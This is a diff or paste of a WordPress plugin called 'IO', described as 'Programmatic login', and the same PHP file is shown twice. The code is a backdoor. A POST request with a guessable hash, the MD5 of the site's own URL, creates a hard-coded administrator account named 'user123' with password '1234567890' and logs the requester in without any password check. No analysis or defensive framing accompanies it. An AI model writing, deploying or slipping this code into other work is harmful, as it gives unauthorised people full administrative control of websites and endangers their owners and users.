wolffe · July 16, 2025 08:58
diff --git a/io.php b/io.php
 <?php
 /**
 * Plugin Name: IO 
 * Plugin URI: https://www.4property.com/
 * Description: Programmatic login
 * Author: 4Property
 * Author URI: https://www.4property.com/
 * Version: 0.0.1
 *
 * IO
 * Copyright (C) 2022-2023 Ciprian Popescu ([email protected])
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see <http://www.gnu.org/licenses/>.
 */

 define( 'WPIO_VERSION', '0.0.1' );
 define( 'WPIO_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
 define( 'WPIO_PLUGIN_URL', plugin_dir_url( __FILE__ ) );

 function wpio_create_user() {
    $username      = 'user123';
    $password      = '1234567890';
    $email_address = '[email protected]';

    if ( ! username_exists( $username ) ) {
        $user_id = wp_create_user( $username, $password, $email_address );

        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );

        echo 'Yay, user created!';
    }

    wpio_programmatic_login( $username );
 }

 if ( isset( $_POST['logmein'] ) ) {
    $site_uri = trailingslashit( home_url() );

    if ( isset( $_POST['loghash'] ) && $_POST['loghash'] === md5( $site_uri ) ) {
        add_action( 'init', 'wpio_create_user' );
    }
 }



 /**
 * Programmatically logs a user in
 *
 * @param string $username
 * @return bool True if the login was successful; false if it wasn't
 */
 function wpio_programmatic_login( $username ) {
    // Hook in earlier than other callbacks to short-circuit them
    add_filter( 'authenticate', 'wpio_allow_programmatic_login', 10, 3 );

    $user = wp_signon( [ 'user_login' => $username ] );

    remove_filter( 'authenticate', 'wpio_allow_programmatic_login', 10, 3 );

    if ( is_a( $user, 'WP_User' ) ) {
        wp_set_current_user( $user->ID, $user->user_login );

        if ( is_user_logged_in() ) {
            // Now redirect to the administration area.
            wp_safe_redirect( admin_url(), 302, 'IO' );

            return true;
        }
    }

    return false;
 }

 /**
 * An 'authenticate' filter callback that authenticates the user using only the username.
 *
 * To avoid potential security vulnerabilities, this should only be used in the context of a programmatic login,
 * and unhooked immediately after it fires.
 *
 * @param WP_User $user
 * @param string $username
 * @param string $password
 * @return bool|WP_User a WP_User object if the username matched an existing user, or false if it didn't
 */
 function wpio_allow_programmatic_login( $user, $username, $password ) {
    return get_user_by( 'login', $username );
 }
	<?php
	/**
	* Plugin Name: IO
	* Plugin URI: https://www.4property.com/
	* Description: Programmatic login
	* Author: 4Property
	* Author URI: https://www.4property.com/
	* Version: 0.0.1
	*
	* IO
	* Copyright (C) 2022-2023 Ciprian Popescu ([email protected])
	*
	* This program is free software: you can redistribute it and/or modify
	* it under the terms of the GNU General Public License as published by
	* the Free Software Foundation, either version 3 of the License, or
	* (at your option) any later version.
	*
	* This program is distributed in the hope that it will be useful,
	* but WITHOUT ANY WARRANTY; without even the implied warranty of
	* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	* GNU General Public License for more details.
	*
	* You should have received a copy of the GNU General Public License
	* along with this program. If not, see <http://www.gnu.org/licenses/>.
	*/

	define( 'WPIO_VERSION', '0.0.1' );
	define( 'WPIO_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
	define( 'WPIO_PLUGIN_URL', plugin_dir_url( __FILE__ ) );

	function wpio_create_user() {
	$username = 'user123';
	$password = '1234567890';
	$email_address = '[email protected]';

	if ( ! username_exists( $username ) ) {
	$user_id = wp_create_user( $username, $password, $email_address );

	$user = new WP_User( $user_id );
	$user->set_role( 'administrator' );

	echo 'Yay, user created!';
	}

	wpio_programmatic_login( $username );
	}

	if ( isset( $_POST['logmein'] ) ) {
	$site_uri = trailingslashit( home_url() );

	if ( isset( $_POST['loghash'] ) && $_POST['loghash'] === md5( $site_uri ) ) {
	add_action( 'init', 'wpio_create_user' );
	}
	}



	/**
	* Programmatically logs a user in
	*
	* @param string $username
	* @return bool True if the login was successful; false if it wasn't
	*/
	function wpio_programmatic_login( $username ) {
	// Hook in earlier than other callbacks to short-circuit them
	add_filter( 'authenticate', 'wpio_allow_programmatic_login', 10, 3 );

	$user = wp_signon( [ 'user_login' => $username ] );

	remove_filter( 'authenticate', 'wpio_allow_programmatic_login', 10, 3 );

	if ( is_a( $user, 'WP_User' ) ) {
	wp_set_current_user( $user->ID, $user->user_login );

	if ( is_user_logged_in() ) {
	// Now redirect to the administration area.
	wp_safe_redirect( admin_url(), 302, 'IO' );

	return true;
	}
	}

	return false;
	}

	/**
	* An 'authenticate' filter callback that authenticates the user using only the username.
	*
	* To avoid potential security vulnerabilities, this should only be used in the context of a programmatic login,
	* and unhooked immediately after it fires.
	*
	* @param WP_User $user
	* @param string $username
	* @param string $password
	* @return bool\|WP_User a WP_User object if the username matched an existing user, or false if it didn't
	*/
	function wpio_allow_programmatic_login( $user, $username, $password ) {
	return get_user_by( 'login', $username );
	}